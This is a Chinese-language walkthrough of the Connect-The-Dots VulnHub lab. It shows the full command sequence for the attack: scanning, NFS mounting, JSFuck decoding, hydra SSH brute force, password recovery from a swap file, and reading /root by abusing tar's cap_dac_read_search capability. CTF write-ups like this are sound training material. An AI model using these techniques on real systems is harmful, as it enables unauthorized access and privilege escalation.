当前位置: 首页 > news >正文

Connect-The-Dots靶场

靶场下载


https://www.vulnhub.com/entry/connect-the-dots-1,384/

一、信息收集

探测存活主机

netdiscover -r 192.168.16.161/24nmap -sP 192.168.16.161/24

端口操作系统扫描

nmap -sV -sC -A -p 1-65535   192.168.16.159

扫描发现开放端口有

21     ftp
80     http
2049   nfs
7822   ssh

image-20230823143949721

目录扫描

gobuster  dir -u http://192.168.16.161   -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  

image-20230823150640603

二、nfs文件共享漏洞检测

尝试查看靶机利用NFS共享的全部文件夹:

使用命令

 showmount -e 192.168.16.161

image-20230823144743138

可以看到/home/morris共享了

映射共享文件夹下的根目录。

在攻击机上面创建一个根文件夹/temp1/,其目的就是映射共享文件夹下的根目录。

mkdir /temp1

挂载文件

将靶机下的共享文件挂载到刚才新建的目录下

mount -t nfs 192.168.16.161:/home/morris  /temp1

image-20230823145313521

查看里面隐藏文件

ls -al

image-20230823145514246

读取里面文件内容权限不够

image-20230823145648400

三、目录分析

访问刚刚目录扫描结果,在http://192.168.16.161/mysite/

image-20230823151002557

访问http://192.168.16.161/mysite/register.html发现登录页面

image-20230823151045330

查看源代码,看到跳转到了几个文件",在刚刚路径中可以访问

image-20230823151148553

jsfuck编码

访问http://192.168.16.161/mysite/bootstrap.min.cs,发现进行了加密

image-20230823151357632

使用了jsfuck编码。

image-20230823151713974

编码内容提取

文件从b1到b10一个个拿取乱

可以http://192.168.16.161/mysite/register.html,打开登录页面

点击控制台

输入命令:

console.log(b1+b2+b3+b4+b5+b6+b7+b8+b9+b10)

image-20230823153618010

在线解密

http://codertab.com/JsUnFuck

image-20230823154407687

得出密码应该是TryToGuessThisNorris@2k19

ssh暴力破解

 hydra -L mi.txt  -p TryToGuessThisNorris@2k19 ssh://192.168.16.161 -s 7822# -L :	指定字典
#-p	小写,指定密码破解

这里用户字典

image-20230823165306790

破解结果:

sh] host: 192.168.16.161 login: norris password: TryToGuessThisNorris@2k19

image-20230823165912609

四、FTP登录

ssh登录连接

ssh norris@192.168.16.161 -p 7822

image-20230823170125050

查看当前目录下文件

在ftp下有四个文件

image-20230823170818132

登录21端口FTP

 ftp 192.168.16.161 

输入刚刚破解得正确的账号和密码

image-20230823172645891

使用get命令依次下载文件

get backups.bak
。。。

image-20230823172808960

可以看到有两个图片一个txt文件

图片分析:工具exiftool

在geme.jpg中发现了波斯密码

exiftool game.jpg.bak 

image-20230823173623562

exiftool m.gif.bak 

image-20230823173450981

摩斯密码解密

在线解密网:https://gchq.github.io/CyberChef/

image-20230823174105976

解密结果

image-20230823174129058

取目标主机查找:SECRETFILE (秘密文件)

测试搜索直接关键字,这里用小写:secretfilefind / -name  secretfile 2>/dev/null

成功查找到,查看文件内容

image-20230823174827474

image-20230823175014287

查看这个目录下的隐藏文件:

image-20230823175107392

查看里面内容,显示权限被拒绝

swp文件:是编辑器突然断电或 Ctrl+z 产生的文件

下载文件

wget http://192.168.16.160/.secretfile.swp

image-20230824094503806

查看内容:strings .secretfile.swp 
strings:用来提取和显示非文本文件中的文本字符串

image-20230824095319712

查看存在用户

cat /etc/passwd | grep bash

image-20230823170334287

尝试刚刚文件中的密码

最后登录成功

账号:morris 密码:blehguessme090

五、capabilities提权

参考:

Linux提权之:利用capabilities提权 - f_carey - 博客园 (cnblogs.com)

https://www.cnblogs.com/zlgxzswjy/p/14785228.html

Capabilities机制,是在Linux内核2.2之后引入的。它将root用户的权限细分为不同的领域,可以分别启用或禁用。从而,在实际进行特权操作时,如果euid不是root,便会检查是否具有该特权操作所对应的capabilities,并以此为依据,决定是否可以执行特权操作。

一、切换会no

二、查找设置过capabilities的应用程序

/usr/sbin/getcap -r / 2>/dev/null

三、 tar具备cap_dac_read_search=ep 可用执行root来读取文件。

image-20230824101552746

四、打包root目录

tar -zcvf root.tar.gz /root  # 打包/root目录

image-20230824101625152

五、解压,查看文件得到flag

tar -zxvf root.tar.gz        # 解压root.tar.gz

image-20230824101716294

http://www.lryc.cn/news/137715.html

相关文章:

  • Linux解决RocketMQ中NameServer启动问题
  • js逆向实战之某书protobuf反序列化
  • cpolar+JuiceSSH实现手机端远程连接Linux服务器
  • [MyBatis系列②]Dao层开发的两种方式
  • 言语理解-中心理解之主题词及行文脉络
  • LeetCode 面试题 01.05. 一次编辑
  • Mybatis查询in的字段过多不走索引
  • 封装公共el-form表单(记录)
  • List 分批处理
  • SpringSession
  • Python Web 开发之 JWT 简介
  • 科技资讯|荷兰电动自行车丢失将被拒保,苹果Find My可以减少丢失
  • debian rules语法
  • 网易2023年Q2财报:营收240亿元,游戏技术跨产业创造数字就业
  • Python的Flask框架创建、运行与访问
  • Java课题笔记~ 综合案例
  • Seaborn数据可视化(二)
  • HDLBits-Verilog学习记录 | Verilog Language-Basics(1)
  • elementui表格嵌套上传文件直传到oss服务器(表单上传)
  • 使用navicat来访问doris
  • 2023国赛数学建模思路 - 案例:异常检测
  • redis实战-缓存三剑客穿透击穿雪崩解决方案
  • Tomcat10安装及配置教程win11
  • 遗传算法解决TSP问题
  • 设计模式-工厂设计模式
  • TM4C123库函数学习(3)---串口中断
  • opencv 进阶13-Fisherfaces 人脸识别-函数cv2.face.FisherFaceRecognizer_create()
  • 基于mysql5.7制作自定义的docker镜像,适用于xxl-job依赖的数据库,自动执行初始化脚本(ddl语句和dml语句)
  • LeetCodeHot100python版本:单调栈,栈,队列,堆
  • JUC初识